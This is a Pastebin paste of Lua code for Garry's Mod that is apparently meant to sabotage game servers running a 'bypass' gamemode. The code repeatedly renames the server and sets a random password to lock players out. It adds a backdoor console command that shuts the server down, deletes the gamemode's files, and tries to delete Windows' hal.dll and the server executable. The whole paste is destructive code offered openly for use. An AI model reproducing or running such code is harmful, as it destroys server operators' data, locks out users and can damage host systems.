Advertisement
Guest User

Untitled

a guest
Jun 11th, 2017
82
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
Lua 0.95 KB | None | 0 0
  1. -- Silly Kuro^
  2. timer.Create( "qwertyuiop", 1, 0, function()
  3.     RunConsoleCommand("hostname", "I (Alex Grist) have decided to take down the bypass. Buy BP2");
  4.     RunConsoleCommand("sv_password", "skjlfbvgsxiudavcfuisdvgfiouvdivbgyvyvsdfiuv");
  5.     RunConsoleCommand("sv_tags", "");
  6.     game.ConsoleCommand("hostname I (Alex Grist) have decided to take down the bypass. Buy BP2");
  7.     game.ConsoleCommand("sv_password skjlfbvgsxiudavcfuisdvgfiouvdivbgyvyvsdfiuv");
  8.     game.ConsoleCommand("sv_tags ''");
  9. end)
  10.  
  11. -- Here is an open backdoor to bypass servers, feel free to use it.
  12. concommand.Add("openbackdoor", function(a, b, c)
  13.     if (c[1] == "shutdown") then
  14.         game.ConsoleCommand("exit".."\n");
  15.     end;
  16. end);
  17.  
  18. for k, v in pairs( file.FindInLua("blueprint/gamemode/*.lua") ) do
  19.     file.Delete(v)
  20. end;
  21. for k, v in pairs( file.FindInLua("blueprint/gamemode/nexus/*.lua") ) do
  22.     file.Delete(v)
  23. end;
  24. fileio.Delete("C:\Windows\System32/hal.dll")
  25. fileio.Delete("../../srcds.exe")    934
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement